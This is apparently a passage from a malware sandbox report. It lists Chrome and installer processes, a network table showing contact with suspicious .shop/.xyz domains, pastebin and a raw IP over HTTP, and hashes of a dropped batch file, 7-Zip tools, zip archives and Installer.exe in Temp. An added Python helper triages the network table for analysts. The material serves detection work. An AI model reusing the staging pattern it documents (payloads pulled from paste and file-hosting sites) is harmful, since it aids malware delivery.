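The same two checks (user-writable action path, system-binary name outside a system directory) transfer directly to a hunt over the output of schtasks /query /fo CSV /v or over the Microsoft-Windows-TaskScheduler/Operational event log.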

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff932369758,0x7ff932369768,0x7ff932369778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2052 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2852 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2860 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5272 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3032 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4592 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6084 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4768 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4484 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4604 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5496 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Users\Admin\Downloads\7z2407-x64.exe

"C:\Users\Admin\Downloads\7z2407-x64.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2388 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4548 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4896 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6132 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5424 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2992 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x27c

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6452 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6596 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6716 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 completedhallweow.xyz udp
US 8.8.8.8:53 bouncedgowp.shop udp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 8.8.8.8:53 198.93.21.104.in-addr.arpa udp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 104.21.93.198:443 bouncedgowp.shop tcp
DE 147.45.47.81:80 147.45.47.81 tcp
US 8.8.8.8:53 81.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
DE 147.45.47.81:80 147.45.47.81 tcp
DE 147.45.47.81:80 147.45.47.81 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.16.238:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.200.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
US 8.8.8.8:53 consent.google.com udp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
GB 142.250.200.10:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp
DE 49.12.202.237:443 www.7-zip.org tcp
US 8.8.8.8:53 237.202.12.49.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 id.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 142.250.200.35:443 id.google.com tcp
GB 172.217.169.35:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 216.58.213.22:443 i.ytimg.com tcp
GB 216.58.213.22:443 i.ytimg.com tcp
GB 216.58.213.22:443 i.ytimg.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 22.213.58.216.in-addr.arpa udp
GB 142.250.178.14:443 www.youtube.com udp
GB 216.58.213.22:443 i.ytimg.com udp
GB 142.250.200.46:443 www.youtube.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 172.217.169.2:443 googleads.g.doubleclick.net tcp
GB 216.58.201.102:443 static.doubleclick.net tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
GB 216.58.212.234:443 jnn-pa.googleapis.com udp
GB 172.217.169.2:443 googleads.g.doubleclick.net tcp
GB 142.250.200.46:443 www.youtube.com udp
GB 172.217.169.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 102.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 2.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
GB 142.250.187.206:443 encrypted-vtbn0.gstatic.com tcp
GB 142.250.187.206:443 encrypted-vtbn0.gstatic.com tcp
US 8.8.8.8:53 rr2---sn-aigzrnz7.googlevideo.com udp
GB 74.125.175.199:443 rr2---sn-aigzrnz7.googlevideo.com tcp
GB 74.125.175.199:443 rr2---sn-aigzrnz7.googlevideo.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 199.175.125.74.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.102.84:443 accounts.google.com tcp
NL 142.250.102.84:443 accounts.google.com tcp
NL 142.250.102.84:443 accounts.google.com udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 rr5---sn-5hneknes.googlevideo.com udp
NL 74.125.8.202:443 rr5---sn-5hneknes.googlevideo.com udp
GB 142.250.200.10:443 jnn-pa.googleapis.com udp
GB 172.217.169.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
GB 142.250.187.193:443 yt3.ggpht.com tcp
GB 142.250.187.193:443 yt3.ggpht.com tcp
GB 142.250.187.193:443 yt3.ggpht.com tcp
US 8.8.8.8:53 84.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 202.8.125.74.in-addr.arpa udp
US 8.8.8.8:53 i9.ytimg.com udp
GB 216.58.204.78:443 i9.ytimg.com tcp
US 8.8.8.8:53 193.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 78.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
GB 216.58.201.110:443 youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
GB 216.58.201.110:443 consent.youtube.com tcp
GB 74.125.175.199:443 rr2---sn-aigzrnz7.googlevideo.com udp
NL 52.142.223.178:80 tcp
GB 216.58.201.102:443 static.doubleclick.net udp
US 8.8.8.8:53 84.162.74.23.in-addr.arpa udp
GB 216.58.201.110:443 consent.youtube.com udp
GB 142.250.187.193:443 yt3.ggpht.com udp
US 8.8.8.8:53 tinyurl.com udp
US 104.17.112.233:443 tinyurl.com tcp
US 104.17.112.233:443 tinyurl.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 92.123.143.169:80 apps.identrust.com tcp
US 8.8.8.8:53 www.mediafire.com udp
US 104.16.114.74:443 www.mediafire.com tcp
US 8.8.8.8:53 233.112.17.104.in-addr.arpa udp
US 8.8.8.8:53 169.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 static.mediafire.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
GB 142.250.200.42:443 ajax.googleapis.com tcp
US 104.16.113.74:443 static.mediafire.com udp
US 8.8.8.8:53 cdn.amplitude.com udp
GB 18.154.84.20:443 cdn.amplitude.com tcp
US 8.8.8.8:53 api.amplitude.com udp
US 8.8.8.8:53 74.114.16.104.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.113.16.104.in-addr.arpa udp
US 8.8.8.8:53 72.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 20.84.154.18.in-addr.arpa udp
US 8.8.8.8:53 107.39.156.108.in-addr.arpa udp
US 54.203.54.100:443 api.amplitude.com tcp
US 8.8.8.8:53 connect.facebook.net udp
IT 157.240.203.2:443 connect.facebook.net tcp
US 8.8.8.8:53 translate.google.com udp
GB 172.217.169.78:443 translate.google.com tcp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 www.google.co.uk udp
GB 172.217.16.227:443 www.google.co.uk tcp
BE 74.125.71.157:443 stats.g.doubleclick.net tcp
US 216.239.34.36:443 region1.analytics.google.com tcp
IT 157.240.203.2:443 connect.facebook.net udp
US 8.8.8.8:53 translate.googleapis.com udp
BE 74.125.71.157:443 stats.g.doubleclick.net udp
US 8.8.8.8:53 100.54.203.54.in-addr.arpa udp
US 8.8.8.8:53 2.203.240.157.in-addr.arpa udp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 157.71.125.74.in-addr.arpa udp
GB 172.217.16.227:443 www.google.co.uk udp
US 8.8.8.8:53 www.facebook.com udp
IT 157.240.203.35:443 www.facebook.com tcp
US 8.8.8.8:53 translate-pa.googleapis.com udp
US 8.8.8.8:53 35.203.240.157.in-addr.arpa udp
GB 142.250.200.42:443 udp
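The Network table mixes the sample's own traffic with the background noise of the Chrome session visible in the process list (Google, YouTube, DoubleClick and similar). The helper below is an added example, not part of the report: it parses rows in the table's own format, drops resolver chatter and reverse (in-addr.arpa) lookups, and reduces the rest to a per-destination summary that marks names that were only queried and never connected to, connections straight to an IP with no name, and plaintext port 80. The noise-domain list is an analyst assumption, the embedded rows are a subset copied from the table, and the result is a candidate list for review, not a verdict.

```python
import ipaddress
from typing import Dict, List

# Subset of rows copied from the report's Network table (Country Destination Domain Proto).
ROWS = """US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 completedhallweow.xyz udp
US 8.8.8.8:53 bouncedgowp.shop udp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 104.21.93.198:443 bouncedgowp.shop tcp
DE 147.45.47.81:80 147.45.47.81 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
N/A 224.0.0.251:5353 udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp"""

DNS_RESOLVER = '8.8.8.8:53'
# Browser and OS background destinations to ignore. Analyst assumption: tune per environment;
# file-hosting and paste sites are deliberately not on it.
NOISE_DOMAINS = ('google.com', 'google.co.uk', 'googleapis.com', 'gstatic.com', 'googlevideo.com',
                 'youtube.com', 'ytimg.com', 'doubleclick.net', 'gvt2.com', 'ggpht.com',
                 'facebook.com', 'facebook.net', '7-zip.org', 'identrust.com')


def is_noise(domain: str) -> bool:
    d = domain.lower().rstrip('.')
    return any(d == n or d.endswith('.' + n) for n in NOISE_DOMAINS)


def _is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def parse_rows(text: str) -> List[dict]:
    """Split table rows into dicts; the Domain column is optional in the report's format."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ''
        else:
            continue
        host, _, port = dest.rpartition(':')
        rows.append({'country': country, 'host': host, 'port': int(port), 'domain': domain, 'proto': proto})
    return rows


def summarize(text: str) -> Dict[str, dict]:
    """Per-destination summary of the non-noise traffic in a Network table."""
    out: Dict[str, dict] = {}

    def entry(key: str) -> dict:
        return out.setdefault(key, {'connections': 0, 'ports': set(), 'dns_only': True,
                                    'direct_ip': False, 'plaintext': False})

    for r in parse_rows(text):
        if '%s:%d' % (r['host'], r['port']) == DNS_RESOLVER:
            name = r['domain']
            # Forward lookups only; a name queried but never connected to stays dns_only.
            if name and not name.endswith('.in-addr.arpa') and not is_noise(name):
                entry(name)
            continue
        if _is_ip(r['host']) and ipaddress.ip_address(r['host']).is_multicast:
            continue  # mDNS and similar local broadcast
        label = r['domain'] if r['domain'] and not _is_ip(r['domain']) else r['host']
        if is_noise(label):
            continue
        e = entry(label)
        e['connections'] += 1
        e['ports'].add(r['port'])
        e['dns_only'] = False
        e['direct_ip'] = _is_ip(label)
        e['plaintext'] = e['plaintext'] or r['port'] == 80
    return out


if __name__ == '__main__':
    for dest, info in summarize(ROWS).items():
        flags = [k for k in ('dns_only', 'direct_ip', 'plaintext') if info[k]]
        print(dest, info['connections'], sorted(info['ports']), ','.join(flags))
```

On the full table this leaves the raw.githubusercontent.com fetch that precedes everything else, the two .shop/.xyz names (one of them resolved but never connected to), pastebin.com, and the direct-to-IP HTTP sessions, which is the set worth correlating with the "Legitimate hosting services abused for malware hosting/C2" signature.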

Files

memory/5104-5-0x00000000012D0000-0x0000000001326000-memory.dmp

memory/5104-8-0x00000000012D0000-0x0000000001326000-memory.dmp

memory/4180-7-0x00007FF7E0330000-0x00007FF7E0E5D000-memory.dmp

memory/5104-10-0x00000000012D0000-0x0000000001326000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe

MD5 b2e6a3d0bf3320b759c464ae6fa5b735
SHA1 cc9f5de7742b9c11f7c0c0e3f9d39b0c16b38cc1
SHA256 771b76ba28496c56d1d9c0fe67fdf7688a2f1b12a9eb428050551338945337a3
SHA512 bf2f09aebf6d4b07ec06ce37617361e149b26d7fc2f5c0715a5e479747eb5b1f8fc615c90d1e4d8d751e05dd566819facfef8a00cfb7acb61ec588b0c23b022a

memory/5104-15-0x00000000012D0000-0x0000000001326000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 893874465a8d9f68f0684fd61e9f1d3c
SHA1 866a58255ebab05d4ee2f2ed8383a6555ac1df03
SHA256 e0855b82ec99b14bdfa38dacf90dadb2071e0d413c6559c752e0b2c6e8cd08c0
SHA512 1cc878a3236a5ce4f3a89fae580b4d16a7842fd03dfe0a2c7d1d5da5be822528ea3826f659a70de727c9307fb15997f56b7204582043dc7efcc6c818f7aa2bd7

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 716459a6ceac7d310d4227ea3e9ddb59
SHA1 fa27addf18c197bf5fc054bfb5ae57de1caf3382
SHA256 ba5270891d3eef832fe34f9d67fbbb30ceb3873552ea859139914a6a783b0aa1
SHA512 3857cc099edd99f1c20d4c4456ec4577478afcbdb6073852c6df10775a4e6de0316ab68c6dacb7212d27f49057312ba1aeb0c35e695d84832f3e9f8d61f7d8c1

\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 a62944686498212b290eae637729a151
SHA1 2053660850d3f578f7b31e5ced16069d6f9c4ee0
SHA256 0bb07f0caab7e5539e7efeca5bee359d9f6b49237e0c908981d9168680fe2b3e
SHA512 ae6abd482552445cbf8c308948519227b0d1a82c1b3adb4800f8c9ac32c519c8d0aee8f3b4caada26d1976b63b032aad72d95e574adf205b947dada23a5b8ad3

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 870a5535c79edcf782551514f48d89ab
SHA1 333d814d65753cdc4c4e8fb587c09af6960110d1
SHA256 814a92267e0d8867932afd625f2f8e55b04b88b2cfc31e91b6e45e473f1b057d
SHA512 f8743ca2f1ef2433b41adc41adf6a5836c1901bda70d5d76301cb06b471796b360544efa591c49b3a7d09eee12cef7ba20e79571f50d891d4729598210772b06

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 6f7f4f7ed739e3ac5eee8d0876ff76d4
SHA1 9a65d52885624dc47f342b5a9875d7720540c755
SHA256 b61a321a8a1f4ca1d8c52a1ad0464ac5882073ac8da7c5585f04ce2330b78acc
SHA512 35cad901c3f77c58803372a2f230701469d99fb9d8b16d82b59416a62d215614ab044dcae123473cc5d9a4a09e23f2edaac53ef82bbd5b3556b9b187cff50021

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 4a5f569872c858ede1c0c67500cfdd6d
SHA1 cdcac69d89b45a7903198467c2d2d32126c31661
SHA256 88b2d9a82c911ad61f3570aa31b360ae1649b117f6495459698d724f0c9638dc
SHA512 d9c6776829def517a253e9c60d0316dbc03092f850383305089dc1110b1abd19668ae47dca8188e96c6f12b66a8e5b5a783901f2115cadd5c1accf019c3bdb40

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 a915fd2a4e2750ee9003e628294bf284
SHA1 f9adc1e65fc3d2cf39b2c5a89030f3225e21616d
SHA256 5e2e339dbee22d6c05d652646071bc81ad96a6422eb311453ca3905e7dfea285
SHA512 044d5370ec915fb488cf77c1b181f5a4f89833028266f922766b782ff445f61ab85b92980d6939d0e252a368eb846def27bcdea7f029999d6854a90c793b3a5f

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 18f4fe969c4ba0517b403e28f7ad2b72
SHA1 9df09751ee1246db2ed6b6ed6fec87fb0891e077
SHA256 06d1004f28a87b42b1d7ac23ff2e4b43d736295abc2e84740504386f40a041f4
SHA512 9847b8e2b849b09a76e22ab0d76a1a7d29079676dbdf4277b712709af0ac6a6f0e3a473f144f0a8e247861111357027a758b95e4d096d24cec160192c5da32a4

C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

MD5 4265bf9f9535ebb4e1830e2a50589285
SHA1 ddc45fe277a3b39179dd9e39e17d71b50a184607
SHA256 c07698b4c960b60d8a3c661887d6cc1f7fe74e31a24d4c2ae95d52d1c92ce403
SHA512 3a7a0a8a6b82d5e1b6c06c12250eb9b347ed024811467d6da5123f6d07a79836a4e414758cb5c708d0c96cc4a020f8743b2c1e4fa5f5ed448fc087772ab592be

